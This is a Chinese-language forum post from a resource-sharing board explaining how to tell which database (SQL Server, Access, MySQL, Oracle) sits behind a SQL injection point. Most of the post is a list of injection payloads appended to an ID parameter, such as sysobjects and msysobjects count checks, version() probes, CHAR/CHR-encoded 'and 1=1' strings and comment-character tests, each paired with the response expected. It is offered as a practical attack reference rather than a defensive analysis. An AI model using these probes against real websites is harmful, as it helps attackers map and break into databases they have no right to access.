设为首页
收藏本站
切换到宽版
登录
立即注册
找回密码
搜索
搜索
本版
帖子
用户
快捷导航
论坛
BBS
VIP用户组
官网群
无名商城论坛
»
论坛
›
资源分享区
›
学习资源专区
›
【FUT】通过注入点判断数据库的类型
返回列表
发帖
查看:
765
|
回复:
0
[TSD/原创]
【FUT】通过注入点判断数据库的类型
[复制链接]
无名
无名
当前离线
积分
32464
1万
主题
1万
帖子
3万
积分
管理员
积分
32464
发消息
发表于 2022-5-8 20:21:10
|
显示全部楼层
|
阅读模式
通过注入点判断什么数据库类型具体方法
SQLSERVER:
ID=1 and (select count (*) from sysobjects)>0 返回正常
ID=1 and (select count (*) from msysobjects)>0返回异常
ID=1 and left(version(),1)=5%23 //红色字体也可能是4
ID=1 and exists(select id from sysobjects)
ID=1 and length(user)>0
ID=1 CHAR(97) CHAR(110) CHAR(100) CHAR(32) CHAR(49) CHAR(61) CHAR(49)
ACCESS:
ID=1 and (select count (*) from sysobjects)>0 返回异常
ID=1 and (select count (*) from msysobjects)>0返回正常
MYSQL:
id=2 and version()>0 返回正常
id=2 and length(user())>0
id=2 CHAR(97, 110, 100, 32, 49, 61, 49)
ORACLE:
ID=1 and '1'||'1'='11
ID=1 and 0>(select count(*) from dual)
ID=1 CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
其他方法:
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
“--”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库
返回
,
and
,
CHAR
,
select
,
ID
相关帖子
•
【FX】利用小黄鸟抓包来获取查绑网站接口
•
【接口源码】网易热评api
•
php数据库封装类库,支持所有数据库
•
【php插件】php爬虫类库,支持自定义语法
•
【GD】iapp添加双击返回键退出
•
【FUT】手机如何用termux安装sqlmap
•
【FUT】代码分享——iapp—弹窗代码说明
•
【Max考核】SQL注入基础语句步骤
•
【FUT】 IAPP给软件启动页增加一个进度条
回复
使用道具
举报
返回列表
发帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表